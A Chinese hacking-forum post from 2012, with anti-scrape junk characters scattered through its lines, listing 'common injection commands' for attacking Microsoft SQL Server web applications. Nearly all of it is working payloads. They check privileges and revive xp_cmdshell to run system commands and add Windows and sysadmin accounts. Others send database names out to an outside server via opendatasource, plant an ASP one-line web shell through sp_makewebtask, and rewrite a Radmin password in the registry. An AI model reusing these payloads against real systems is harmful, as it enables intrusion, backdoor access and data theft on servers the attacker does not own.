找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2010|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
. S; l4 r) j; G: band 1=(Select IS_MEMBER('db_owner'))
0 S" y( Z& o; I: G: o" rAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--2 u* D+ D! f% p3 W# F: I" d# r

2 n5 |0 _# C: P0 v' u3 i5 j//检测是否有读取某数据库的权限: b* z: x1 f" D0 e1 e; a% z+ w# K# T
and 1= (Select HAS_DBACCESS('master'))
. h, W& n! U- C; H/ E7 z5 OAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --+ C  L' u% p: ?- I8 W( \: A

* @2 W' W# W7 K; {% z/ R  U* G" u
数字类型
2 _8 K/ R9 g- c5 @and char(124)%2Buser%2Bchar(124)=0' o. D# U9 X3 e8 s: B+ X
& C/ A9 a" X9 ^
字符类型
# q5 C& \' d6 b0 G. F' and char(124)%2Buser%2Bchar(124)=0 and ''='
6 ]) b3 ~& {) W# p
+ a8 E% Y1 S. }) h: v9 G5 w8 z3 b搜索类型2 j( C1 t; i, ~* y) F
' and char(124)%2Buser%2Bchar(124)=0 and '%'='& h, R3 G7 {9 C' t* m# Z& p/ ~) ~
5 r3 G! ^; S) O( ]9 ~
爆用户名
! D2 j4 ]  `5 C/ |( tand user>0
5 m9 j& w9 p' \9 ~9 j. F' and user>0 and ''='
+ W0 U% S! r) s) B  l' T$ ^# Y
1 G) x, K. x; @检测是否为SA权限7 ]5 S- Q- }1 ?. q* \& ^
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--7 n) n8 |, p' h
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' ^4 p6 V; V8 u
; q1 k: @. t! {/ B检测是不是MSSQL数据库
" f1 F3 N! S$ n! _0 z  gand exists (select * from sysobjects);--) d7 W2 v! M# d9 `$ d% a
" [0 u8 |$ P  g2 J/ U
检测是否支持多行
3 v' t5 M" [$ `: t;declare @d int;--
) M5 c6 ]8 I4 }( Y8 L# i4 ~2 v: H4 [- j; F
恢复 xp_cmdshell
2 ]1 f* W5 m8 Z- ~  [7 S;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
, Z. B6 I* s1 d% O1 ]3 U) q$ b6 {) |" F2 y$ |; l
, H  @& D. f2 }6 ~5 w; R
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')+ W4 C/ y8 N( T) B' x) m
7 }+ j& _6 q: f- |
//-----------------------) s! m) K0 l! D3 A3 `4 d+ A
//       执行命令
. }5 Q) [4 e- B% p; y% r//-----------------------
5 x: V7 Z9 b! x7 g/ r) A首先开启沙盘模式:
3 O) H% }! E; W" aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. g# g" ]/ O3 F1 x& b2 u* ^+ h4 h  j9 ]" k" |( ?; Z1 o9 G& A
然后利用jet.oledb执行系统命令
" g( M7 c  o3 w! D3 [select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 |- c3 W9 @- E2 p0 u4 e

9 }8 g6 z0 I. R" O) a" J执行命令
0 `' P& M+ g. W" x! d* V;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--+ E# V% }( X, \# q6 b/ c3 O

; }, ]9 G% V7 M, C6 j5 YEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'+ l  k" p8 c2 O

8 ~- V  p, x) H9 s. m判断xp_cmdshell扩展存储过程是否存在:
! \- s! i5 D5 u7 h- K0 E$ ahttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
' t% R! [$ E3 q: s7 A4 I0 F" ~- p) t# S/ ~5 U% A# m
写注册表
( C- c9 E6 J, {2 u7 C; e8 L( _$ l' cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ s& E( O) K# J* R: U. R$ O, U* O, C" q% [7 ]9 E9 t3 e  v- }
REG_SZ/ R. v3 D, v0 O5 l# I

. `+ B# R+ P- R  S1 Q- l1 b读注册表
! e2 }+ u4 c7 R  _5 Hexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
! M' P! g9 [' ]
1 ]) }/ A) K+ v- C读取目录内容
  K6 J* `8 @) |8 iexec master..xp_dirtree 'c:\winnt\system32\',1,1
, i1 H) z  }# e* T; ?8 D, N
3 B- D- b$ n0 q2 M. j) c. w
* N( e9 Z9 W  P数据库备份
. @, l/ }% Z+ m* E: S4 ?! S  j$ M1 A+ sbackup database pubs to disk = 'c:\123.bak'
& L5 p) j& A5 E2 {' \  L2 y2 I( M) O, y1 ?5 n- m) ]
//爆出长度: j. q" I/ M- J# k' j, Q
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
' r4 {7 `0 h# ?. }) |4 B
7 G. {0 K' k+ e7 W/ ?
4 T% W/ r  n; B1 G
' Z% B  j9 d+ f& x2 r更改sa口令方法:用sql综合利用工具连接后,执行命令:1 h9 E0 W% T5 B- ]4 f
exec sp_password NULL,'新密码','sa'
$ R. w0 t  f' p! {; G8 U( s" v) K9 }' B% q
添加和删除一个SA权限的用户test:1 r+ Q- V' [2 B- l$ l
exec master.dbo.sp_addlogin test,95307721 d( u/ f3 Z" e# _' M3 @
exec master.dbo.sp_addsrvrolemember test,sysadmin  u8 B% B7 T5 Q* g# l/ V) a8 x8 [1 S

4 n- h" \: m. z删除扩展存储过过程xp_cmdshell的语句:0 j" o- ~6 X7 F+ u9 j
exec sp_dropextendedproc 'xp_cmdshell'+ h0 e0 s) A' f3 k" Q8 P2 r7 M; s% l
$ t% C4 _4 ^6 B4 q) y+ `
添加扩展存储过过程6 W3 Z: Z; a5 e' k
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
/ i& x: T: i- e" S2 c% |GRANT exec On xp_proxiedadata TO public
1 x2 `* z8 {. q- [: z  k5 n. s
1 z( P8 }$ ?# y- w- w
( l  U  `2 F0 [( e/ _停掉或激活某个服务。2 @8 U. e; j9 L: X; I. f7 j* h
! ?* v0 v8 H, B2 U8 f4 o, W
exec master..xp_servicecontrol 'stop','schedule'
* [$ d0 ?; c3 i4 t/ l! mexec master..xp_servicecontrol 'start','schedule'
+ m2 Q3 H+ L! A3 x
  h# b/ c# n+ ]% L6 rdbo.xp_subdirs9 ?8 K" m6 k8 o
! U/ g( i2 T3 p: s- W0 d6 c0 e) F
只列某个目录下的子目录。
- f2 Q* e, Y( S  dxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'" u0 P  k8 F! i8 g; B

: x& R7 R) @; y6 ddbo.xp_makecab
, ^* j+ P; m. ]8 a/ e5 O! F! b/ G9 T* A  k1 j9 `
将目标多个档案压缩到某个目标档案之内。2 t( |9 @2 L  G2 {5 P: j
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。0 [2 n4 c) a2 X0 e7 f  `
$ p* N. U2 {% Z* U: H4 q
dbo.xp_makecab" z# x6 t& r7 L$ }) w
'c:\test.cab','mszip',1,
' \) P9 V+ G3 m0 A% E'C:\Inetpub\wwwroot\SQLInject\login.asp',
5 X- e4 S/ Q- G% y$ m'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
: d( f& `% ~. y* T2 K2 H. E+ X
1 |' ~6 {/ o; w% `  Gxp_terminate_process
+ m& W& d7 u/ ]  f" q& q  [! h( X8 G1 Z1 i! A3 }
停掉某个执行中的程序,但赋予的参数是 Process ID。; X3 J- Q* u2 a
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
$ [: z2 p9 o; G; j7 M! T2 s0 W7 r' j- O4 s" t% T
xp_terminate_process 2484; `. }( B+ D. _6 n. h
9 i/ u, P# I2 i0 l. |
xp_unpackcab
" E+ y$ _, ?; ^! K$ E* L  ^$ G# L7 ?4 m! M4 n3 Q! n
解开压缩档。' X8 W$ g& t* F% n; G( P
2 V8 H- p$ w, D* [! h# B
xp_unpackcab 'c:\test.cab','c:\temp',1
5 p1 S6 B1 P7 I1 X0 Z$ E; n* l6 m5 J0 m$ u

" v. ]/ m' L. C" b; U/ a某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 O2 ^5 j' V. i! }6 t+ S# t% [3 n, {! q* m. t
create database lcx;
! U# k1 c% I& WCreate TABLE ku(name nvarchar(256) null);
) z! K7 F4 B5 |! |# ]6 SCreate TABLE biao(id int NULL,name nvarchar(256) null);
3 v+ l8 I2 F+ d4 Z% u! S. c# r+ F
$ R' @- K' g8 s: q7 U* @5 K% C% s//得到数据库名
7 n( ]) f! [* jinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases/ _/ n; c# I- s8 F8 N

- F2 N. @8 G$ M  Z7 m% ]; C% K+ W
& w" m, x$ l% X" z( M//在Master中创建表,看看权限怎样
7 ]" c8 b/ |" H' h' p. k" R* `Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--6 p0 Y6 a# z8 P4 @8 c* V* p0 m
3 r% G4 |+ f% H5 H, l! e4 ^% c
用 sp_makewebtask直接在web目录里写入一句话马:
3 f" A( m- E6 Z* Q3 S& `: Ihttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
0 v) A$ A. [- P6 ^# w" A+ ]9 ~" B* f( B
//更新表内容0 ^( p, g4 a9 D" G
Update films SET kind = 'Dramatic' Where id = 123
* q3 o9 L& G  Y9 a' q; R" Y, p& E1 N/ ?" o* [9 _3 k7 d+ R7 K
//删除内容
$ D& y, p+ j3 c9 X# d( P) fdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表